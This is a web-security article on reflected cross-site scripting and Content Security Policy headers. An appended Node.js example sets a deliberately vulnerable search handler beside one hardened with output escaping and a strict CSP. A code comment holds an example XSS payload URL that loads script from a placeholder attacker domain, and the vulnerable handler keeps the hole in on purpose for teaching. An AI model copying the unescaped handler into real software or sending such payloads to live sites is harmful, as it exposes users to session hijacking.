By Nick Heath in Web Designer, December 1, 2014
Lessen the risk of falling victim to one of the biggest security threats on the web by sending Content Security Policy (CSP) headers from your website. Cross-site scripting (XSS) is identified as one of the main threats to web users by the OWASP Foundation. CSP is a defence-in-depth measure: it restricts where the browser may load scripts from and whether inline script runs at all, but it does not replace correct output escaping.
XSS occurs when a malicious third party injects a script into content served by your website. Sites that return user-supplied content to the browser without validating it, or without escaping it for the context in which it appears (HTML body, attribute, JavaScript, URL), are vulnerable to XSS.
For example, take a site that allows users to search for a term and returns their query alongside the results, e.g. 'You searched for cats'. If the site doesn't escape or validate the query 'cats' before writing it into the page, an attacker can append HTML to the query parameter in the URL, for instance a <script> tag whose src points to a malicious JavaScript file hosted on another domain.
Other users could then be sent the crafted URL alongside a message saying 'Look at these cute cats' and, if they clicked on the link, the script would execute in their browser, inside their own session with the vulnerable site. This is an example of what is called reflected XSS, where data is read directly from the HTTP request and reflected back in the HTTP response without being escaped.
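The search page described above, as an added example that is not part of the original article: a minimal Node.js request handler written first as the vulnerable version (query interpolated straight into the page) and then hardened with context-aware HTML escaping plus a Content-Security-Policy header. The handler functions return a plain status/headers/body object instead of writing to a socket so the example runs offline; the domain attacker.invalid in the comments is a placeholder, not a real host.

```javascript
// Added example (not from the original article). Two versions of a
// "You searched for ..." page: the reflected-XSS-vulnerable one, and a
// hardened one that escapes on output and sends a strict CSP header.

// Escape the five characters that matter in an HTML text or attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Extract the ?q= parameter from a request URL. The base origin is only
// needed by the WHATWG URL parser; it does not have to match a real host.
function getQuery(requestUrl) {
  return new URL(requestUrl, 'http://localhost').searchParams.get('q') || '';
}

// VULNERABLE: the raw query is interpolated into the HTML, so a URL such as
//   /search?q=cats<script src="https://attacker.invalid/x.js"></script>
// (attacker.invalid is a placeholder domain) makes the victim's browser load
// and run third-party script in their session. This is reflected XSS.
function renderVulnerable(requestUrl) {
  const q = getQuery(requestUrl);
  return {
    status: 200,
    headers: { 'Content-Type': 'text/html; charset=utf-8' },
    body: `<!doctype html><p>You searched for ${q}</p>`,
  };
}

// Strict policy: scripts only from the page's own origin, no inline script,
// no eval, no plugins, and no <base> tricks that would redirect 'self'.
// Without 'unsafe-inline', inline <script> blocks, onclick= handlers and
// javascript: URLs are refused by the browser even if escaping fails elsewhere.
const CSP = [
  "default-src 'self'",
  "script-src 'self'",
  "object-src 'none'",
  "base-uri 'self'",
].join('; ');

// HARDENED: escape on output (the real fix) and send CSP as defence in depth.
function renderSafe(requestUrl) {
  const q = getQuery(requestUrl);
  return {
    status: 200,
    headers: {
      'Content-Type': 'text/html; charset=utf-8',
      'Content-Security-Policy': CSP,
    },
    body: `<!doctype html><p>You searched for ${escapeHtml(q)}</p>`,
  };
}

// Crude check used to compare the two renderings: does the HTML contain a
// <script> element with an external src? Not a general XSS detector.
function hasExternalScript(html) {
  return /<script\b[^>]*\bsrc\s*=/i.test(html);
}
```

In a real server the returned object maps onto res.writeHead(status, headers) and res.end(body); the vulnerable rendering is kept only to show the difference. Note that the CSP header would also block a same-origin page that legitimately relies on inline scripts, so tighten the policy alongside moving such scripts into external files under your own origin.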